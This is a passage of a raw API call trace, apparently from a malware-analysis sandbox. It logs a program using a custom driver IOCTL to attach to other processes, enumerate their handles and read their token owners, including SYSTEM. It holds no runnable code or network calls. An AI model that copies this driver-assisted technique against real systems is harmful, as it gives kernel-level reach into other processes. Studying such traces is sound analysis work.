DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4e93a0, HandleInformation=0x0) returned 0x0 [0291.856] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.857] PsReleaseProcessExitSynchronization () returned 0x2 [0291.857] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffe2 [0291.857] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.857] ObfDereferenceObject (Object=0xffffe0006a4e93a0) returned 0x7f9d [0291.857] IoCompleteRequest () returned 0x0 [0291.857] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.857] PsAcquireProcessExitSynchronization () returned 0x0 [0291.857] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.857] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006921d580, HandleInformation=0x0) returned 0x0 [0291.857] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.857] PsReleaseProcessExitSynchronization () returned 0x2 [0291.857] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffe1 [0291.857] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.857] ObfDereferenceObject (Object=0xffffe0006921d580) returned 0x7ffe [0291.857] IoCompleteRequest () returned 0x0 [0291.857] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.857] PsAcquireProcessExitSynchronization () returned 0x0 [0291.857] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.857] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068515f20, HandleInformation=0x0) returned 0x0 [0291.857] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.857] PsReleaseProcessExitSynchronization () returned 0x2 [0291.857] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffe0 [0291.857] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.857] ObfDereferenceObject (Object=0xffffe00068515f20) returned 0x7ffa [0291.857] IoCompleteRequest () returned 0x0 [0291.857] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.857] PsAcquireProcessExitSynchronization () returned 0x0 [0291.857] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.857] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a453090, HandleInformation=0x0) returned 0x0 [0291.857] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.857] PsReleaseProcessExitSynchronization () returned 0x2 [0291.857] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffdf [0291.857] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.857] ObfDereferenceObject (Object=0xffffe0006a453090) returned 0xffc4 [0291.857] IoCompleteRequest () returned 0x0 [0291.857] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.857] PsAcquireProcessExitSynchronization () returned 0x0 [0291.857] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.857] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a453090, HandleInformation=0x0) returned 0x0 [0291.857] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.857] PsReleaseProcessExitSynchronization () returned 0x2 [0291.857] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffde [0291.857] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.857] ObfDereferenceObject (Object=0xffffe0006a453090) returned 0xffc3 [0291.857] IoCompleteRequest () returned 0x0 [0291.858] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.858] PsAcquireProcessExitSynchronization () returned 0x0 [0291.858] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.858] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006997ca70, HandleInformation=0x0) returned 0x0 [0291.858] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.858] PsReleaseProcessExitSynchronization () returned 0x2 [0291.858] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffdd [0291.858] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.858] ObfDereferenceObject (Object=0xffffe0006997ca70) returned 0x7fff [0291.858] IoCompleteRequest () returned 0x0 [0291.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x72c) returned 0x188 [0291.858] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.858] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000728cb640, HandleInformation=0x0) returned 0x0 [0291.858] ObOpenObjectByPointer (in: Object=0xffffe000728cb640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.858] ObfDereferenceObject (Object=0xffffe000728cb640) returned 0x4000c [0291.858] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.858] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.858] IoCompleteRequest () returned 0x0 [0291.858] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.858] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.859] CloseHandle (hObject=0x18c) returned 1 [0291.859] CloseHandle (hObject=0x188) returned 1 [0291.859] PsLookupProcessByProcessId (in: ProcessId=0x72c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.859] PsAcquireProcessExitSynchronization () returned 0x0 [0291.859] KeStackAttachProcess (in: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400) [0291.859] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a299f20, HandleInformation=0x0) returned 0x0 [0291.859] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.859] PsReleaseProcessExitSynchronization () returned 0x2 [0291.859] ObfDereferenceObject (Object=0xffffe000728cb640) returned 0x3800a [0291.859] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.859] ObfDereferenceObject (Object=0xffffe0006a299f20) returned 0x7fff [0291.859] IoCompleteRequest () returned 0x0 [0291.859] PsLookupProcessByProcessId (in: ProcessId=0x72c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.859] PsAcquireProcessExitSynchronization () returned 0x0 [0291.859] KeStackAttachProcess (in: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400) [0291.859] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006920bcf0, HandleInformation=0x0) returned 0x0 [0291.859] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.859] PsReleaseProcessExitSynchronization () returned 0x2 [0291.859] ObfDereferenceObject (Object=0xffffe000728cb640) returned 0x38009 [0291.859] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.859] ObfDereferenceObject (Object=0xffffe0006920bcf0) returned 0x7ffe [0291.859] IoCompleteRequest () returned 0x0 [0291.859] PsLookupProcessByProcessId (in: ProcessId=0x72c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.859] PsAcquireProcessExitSynchronization () returned 0x0 [0291.859] KeStackAttachProcess (in: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400) [0291.859] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7beb60, HandleInformation=0x0) returned 0x0 [0291.859] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.859] PsReleaseProcessExitSynchronization () returned 0x2 [0291.859] ObfDereferenceObject (Object=0xffffe000728cb640) returned 0x38008 [0291.859] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.859] ObfDereferenceObject (Object=0xffffe0006a7beb60) returned 0x7fff [0291.859] IoCompleteRequest () returned 0x0 [0291.859] PsLookupProcessByProcessId (in: ProcessId=0x72c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.859] PsAcquireProcessExitSynchronization () returned 0x0 [0291.859] KeStackAttachProcess (in: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000728cb640, ApcState=0xffffd000ac0cf400) [0291.859] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a36cf20, HandleInformation=0x0) returned 0x0 [0291.859] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.859] PsReleaseProcessExitSynchronization () returned 0x2 [0291.859] ObfDereferenceObject (Object=0xffffe000728cb640) returned 0x38007 [0291.860] ObQueryNameString (in: Object=0xffffe0006a36cf20, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.860] ObfDereferenceObject (Object=0xffffe0006a36cf20) returned 0x800f [0291.860] IoCompleteRequest () returned 0x0 [0291.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x468) returned 0x188 [0291.860] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.860] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a6f4840, HandleInformation=0x0) returned 0x0 [0291.860] ObOpenObjectByPointer (in: Object=0xffffe0006a6f4840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.860] ObfDereferenceObject (Object=0xffffe0006a6f4840) returned 0x2801f [0291.860] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.860] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.860] IoCompleteRequest () returned 0x0 [0291.860] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.860] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.861] CloseHandle (hObject=0x18c) returned 1 [0291.861] CloseHandle (hObject=0x188) returned 1 [0291.861] PsLookupProcessByProcessId (in: ProcessId=0x468, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.861] PsAcquireProcessExitSynchronization () returned 0x0 [0291.861] KeStackAttachProcess (in: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400) [0291.861] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a2ff20, HandleInformation=0x0) returned 0x0 [0291.861] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.861] PsReleaseProcessExitSynchronization () returned 0x2 [0291.861] ObfDereferenceObject (Object=0xffffe0006a6f4840) returned 0x2001d [0291.861] ObQueryNameString (in: Object=0xffffe00068a2ff20, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.861] ObfDereferenceObject (Object=0xffffe00068a2ff20) returned 0x7f2b [0291.861] IoCompleteRequest () returned 0x0 [0291.861] PsLookupProcessByProcessId (in: ProcessId=0x468, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.861] PsAcquireProcessExitSynchronization () returned 0x0 [0291.861] KeStackAttachProcess (in: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400) [0291.861] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000684244a0, HandleInformation=0x0) returned 0x0 [0291.861] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.861] PsReleaseProcessExitSynchronization () returned 0x2 [0291.861] ObfDereferenceObject (Object=0xffffe0006a6f4840) returned 0x2001c [0291.861] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.861] ObfDereferenceObject (Object=0xffffe000684244a0) returned 0x7fff [0291.861] IoCompleteRequest () returned 0x0 [0291.861] PsLookupProcessByProcessId (in: ProcessId=0x468, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.861] PsAcquireProcessExitSynchronization () returned 0x0 [0291.861] KeStackAttachProcess (in: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400) [0291.861] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a54e8f0, HandleInformation=0x0) returned 0x0 [0291.861] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.861] PsReleaseProcessExitSynchronization () returned 0x2 [0291.861] ObfDereferenceObject (Object=0xffffe0006a6f4840) returned 0x2001b [0291.861] ObQueryNameString (in: Object=0xffffe0006a54e8f0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.861] ObfDereferenceObject (Object=0xffffe0006a54e8f0) returned 0x7fff [0291.861] IoCompleteRequest () returned 0x0 [0291.861] PsLookupProcessByProcessId (in: ProcessId=0x468, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.861] PsAcquireProcessExitSynchronization () returned 0x0 [0291.862] KeStackAttachProcess (in: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400) [0291.862] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a10c790, HandleInformation=0x0) returned 0x0 [0291.862] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.862] PsReleaseProcessExitSynchronization () returned 0x2 [0291.862] ObfDereferenceObject (Object=0xffffe0006a6f4840) returned 0x2001a [0291.862] ObQueryNameString (in: Object=0xffffe0006a10c790, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.862] ObfDereferenceObject (Object=0xffffe0006a10c790) returned 0x7fff [0291.862] IoCompleteRequest () returned 0x0 [0291.862] PsLookupProcessByProcessId (in: ProcessId=0x468, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.862] PsAcquireProcessExitSynchronization () returned 0x0 [0291.862] KeStackAttachProcess (in: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a6f4840, ApcState=0xffffd000ac0cf400) [0291.862] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a482940, HandleInformation=0x0) returned 0x0 [0291.862] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.862] PsReleaseProcessExitSynchronization () returned 0x2 [0291.862] ObfDereferenceObject (Object=0xffffe0006a6f4840) returned 0x20019 [0291.862] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.862] ObfDereferenceObject (Object=0xffffe0006a482940) returned 0x8000 [0291.862] IoCompleteRequest () returned 0x0 [0291.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x998) returned 0x188 [0291.862] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.862] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a3e8840, HandleInformation=0x0) returned 0x0 [0291.862] ObOpenObjectByPointer (in: Object=0xffffe0006a3e8840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.862] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x3000e [0291.862] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.862] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.862] IoCompleteRequest () returned 0x0 [0291.862] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.862] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.863] CloseHandle (hObject=0x18c) returned 1 [0291.863] CloseHandle (hObject=0x188) returned 1 [0291.863] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.863] PsAcquireProcessExitSynchronization () returned 0x0 [0291.863] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0291.863] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a69c090, HandleInformation=0x0) returned 0x0 [0291.863] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.863] PsReleaseProcessExitSynchronization () returned 0x2 [0291.863] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x2800c [0291.863] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.863] ObfDereferenceObject (Object=0xffffe0006a69c090) returned 0x7ffd [0291.863] IoCompleteRequest () returned 0x0 [0291.863] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.863] PsAcquireProcessExitSynchronization () returned 0x0 [0291.863] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0291.863] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a557b60, HandleInformation=0x0) returned 0x0 [0291.863] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.863] PsReleaseProcessExitSynchronization () returned 0x2 [0291.863] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x2800b [0291.863] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.863] ObfDereferenceObject (Object=0xffffe0006a557b60) returned 0x7fff [0291.864] IoCompleteRequest () returned 0x0 [0291.864] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.864] PsAcquireProcessExitSynchronization () returned 0x0 [0291.864] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0291.864] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a441450, HandleInformation=0x0) returned 0x0 [0291.864] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.864] PsReleaseProcessExitSynchronization () returned 0x2 [0291.864] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x2800a [0291.864] ObQueryNameString (in: Object=0xffffe0006a441450, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.864] 